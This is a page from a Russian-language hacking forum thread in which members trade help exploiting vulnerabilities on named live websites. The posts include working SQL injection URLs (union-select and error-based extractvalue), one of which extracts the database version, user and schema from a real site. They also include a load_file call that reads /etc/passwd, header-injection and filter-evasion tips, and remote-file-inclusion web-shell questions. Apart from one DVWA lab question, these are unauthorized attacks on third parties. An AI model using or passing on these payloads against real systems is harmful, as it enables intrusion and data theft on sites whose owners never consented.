Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    1: WHERE (name_ru LIKE '%name') order by{sql-запрос}#%' OR product_code LIKE '%'%') AND...

    2: WHERE (name_ru LIKE '%'%' OR product_code LIKE '%name') order by{sql-запрос}'#%') AND...

    P.S: Тут провидцев нет, давай урл и вывод ошибки!
     
    _________________________
    3 people like this.
  2. Tir TNT

    Tir TNT New Member

    Joined:
    1 Oct 2012
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    old.islam.kg/?i=1'&lg=kg
    Помогите со скулей плз. Еще возможно IP записывает, так что..
    p.s. ip конечно изменен
     
    #21162 Tir TNT, 6 Oct 2012
    Last edited: 6 Oct 2012
  3. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Там режутся пробелы, /**/, пробывал еще такие варианты - %09,%0A,%0B,%0C,%0D , при них запрос как бы "вырезается", фильтруются также (). Если найдеш способоб обойти фильтр пробелов, то скорейвсего раскрутишь если она не слепая конечно.

    По ip еще, у меня сейчас нет возможности проверить, но попробуй сам отправить в хедерах свой X-FORWARDED-FOR с sql inj, если повезет и ip у них определяется именно так, то может там и условия получше будут.
     
  4. SpiritDt

    SpiritDt New Member

    Joined:
    30 May 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Скулю обработал - http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
    но запара - фильтрация кавычек - file_priv считать ну никак не получается
     
  5. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Кроме X-Forwarded-For можно попробовать Forwarded, X-Real-IP, Client-IP, HTTP-From, Via
     
  6. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Нету доступа к mysql.user.
    Что бы смотреть file_priv кавычки не нужны.
     
    _________________________
  7. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    есть какой-нибудь мануал или статья о том как залиться если file_priv=Y но magic_quotes_gpc = on

    зы это читал ,но не понял логику запросов
    https://forum.antichat.ru/showpost.php?p=663815&postcount=39
     
  8. Nikel3rN

    Nikel3rN New Member

    Joined:
    3 Oct 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Не могу раскрутить , хелп
    http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C%27
     
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Magic Quotes = On

    Code:
    http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,'10',11+--+
    False

    File_Priv=N

    Code:
    http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,load_file(0x2f6574632f706173737764),11+--+
    False

    Саму БД не смотрел - мож там админка есть...

    Это прокатывает только при двойном запросе и то, при варианте, что данные передаваемые из первого запроса во второй дополнительно не фильтруются.
     
    _________________________
    #21169 BigBear, 9 Oct 2012
    Last edited: 9 Oct 2012
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Тут вся проблема в том, что магические кавычки включены

    Остаётся вариант Error-Based

    Твой запрос имеет вид

    Code:
    SELECT m.*, m.name_ru AS subName, m.name_eng AS name, m.ext_id AS id FROM l2_monsters_rg AS m
    JOIN l2_monsters_skills AS strt ON (strt.npc_id=m.ext_id and strt.skill_id=4309) 
    JOIN l2_drops_rg AS `drop` ON (`drop`.npc_id=m.id and `drop`.item_id in (SELECT id FROM l2_items_rg WHERE name_eng like '%[COLOR=Red][INJECT][/COLOR]')) WHERE m.lvl BETWEEN 21 and 30 AND m.name_eng!='' and m.type in ("warrior", "treasure", "boss", "zzoldagu", "") ORDER BY m.lvl;
    
    и всё бы хорошо, в теории должен бы был проканать запрос вида

    Code:
    SELECT m.*, m.name_ru AS subName, m.name_eng AS name, m.ext_id AS id FROM l2_monsters_rg AS m
    JOIN l2_monsters_skills AS strt ON (strt.npc_id=m.ext_id and strt.skill_id=4309) 
    JOIN l2_drops_rg AS `drop` ON (`drop`.npc_id=m.id and `drop`.item_id in (SELECT id FROM l2_items_rg WHERE name_eng like '%[COLOR=Red]\\')) or (select count(*) from l2_drops_rg group by concat(version(),floor(rand(0)*2))+--+[/COLOR]%'))
    WHERE m.lvl BETWEEN 21 and 30 AND m.name_eng!='' and m.type in ("warrior", "treasure", "boss", "zzoldagu", "") ORDER BY m.lvl;
    но в нашем случае хвост запроса не отбрасывается никаким способом. Во всяком случае - я пока не нашёл способа инъекта.

    P.S. Поправьте меня, если я ошибаюсь.

    P.S S. cat1vo красава ! А у меня сёдня бошка вообще не варит после картошки =(
     
    _________________________
    #21170 BigBear, 9 Oct 2012
    Last edited: 9 Oct 2012
  11. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Дальше думаю сами сможете?
    Code:
    http://www.l2db[dot]ru/npc/index/2/rg/all/all/8/all/\'))+and+extractvalue(1,concat(0x3a,version()))+--+-
    Version: 5.1.52-log
    DB_user: [email protected]
    Current_db: l2dbtest

    to BigBear, поправил, Вы ошибались! :)
     
    #21171 cat1vo, 9 Oct 2012
    Last edited: 9 Oct 2012
    2 people like this.
  12. Lastman

    Lastman New Member

    Joined:
    12 Dec 2010
    Messages:
    51
    Likes Received:
    0
    Reputations:
    0
    Народ нужен хелп, LFI вроде есть, но не выводится ниче.
    deabloz.com/modules/boonex/poll/index.php?aModule=

    Пробую данный сплоит:
    1337day.com/exploits/14663
     
  13. wkuzy

    wkuzy New Member

    Joined:
    8 Aug 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    -5
    что то не получается раскрутить,может кто подсказать

    http://www.turboklicker.de/index.php?content=/nickpage&id=2
     
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Указывайте, пожалуйста, параметры в которых вы подозреваете инъекцию. И способы, которые вы пробовали для их раскрутки.
     
    _________________________
  15. Stricker

    Stricker New Member

    Joined:
    20 Mar 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Есть сайт, в при входе на него твой айпи просто проверяется в базе и если найден то Die, айпи проверяется по HTTP_X_FORWARDED_FOR, который можно заменить в хттп заголовке
    Но если запрос успешен то он просто он ничего не выводит. Прав за напись нету.

    Самая главная проблема вот в чем, фильтруется ',' и ';' и фильтруется таким образом, что было до нее обрезает впрочь. т.е:
    x-forwarded-for: UNION SELECT ALL (SELECT, * FROM banned) -- AND users='"

    А ответ MySQL ERROR 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '", 95.134.22.54'' at line 1
    #0 mysql_exec(select * from banned where ip='* FROM banned) -- AND users='", Айпи тут был')
     
  16. Tir TNT

    Tir TNT New Member

    Joined:
    1 Oct 2012
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Спасибо.

    Подскажите с SQL inj в DVWA level medium
    http://localhost/dvwa/vulnerabilities/sqli/?id=1'+UnIoN+sElECT+1,2--+&Submit=Submit
    выводит
    '\' - с таким еще не сталкивался. в статьях вроде про обходы не пишут

    upd. разобрался. успешно прошел запрос:
    только не понимаю, как я это обошел, подскажите плиз.

    upd2.
    перешел на high. его реально пройти вообще? как выполнить xss?
     
    #21176 Tir TNT, 12 Oct 2012
    Last edited by a moderator: 12 Oct 2012
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Почитай про Magic Quotes

    А вот тут можно прочитать про отличия инъекций в строковом параметре от инъекций в числовом параметре
     
    _________________________
  18. mod_

    mod_ New Member

    Joined:
    6 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    здравствуйте.
    www.site1.ru/index.php?page=http://www.site2.ru срабатывает и подгружает site2 вместе с site1.везде тут в статьях написано ура супер круто мы получили веб шелл.но чета подробнее об этом не нашел. вопрос таков.что делать дальше)
    я так понимаю теперь необходимо залить на some хостинг файлик shell.php и составить
    запрос типа http://site1.ru/index.php?page=http://www.site2.ru/shell - без расширения на конце. это и будет наш шелл? я правильно все понимаю? если нет пните в правильную сторону)
     
  19. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    php include
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    mod_

    вероятнее там ссылка открывается в iframe а не инклуд и тп, разберись, попробуй подключить php файлы
     
    _________________________
Thread Status:
Not open for further replies.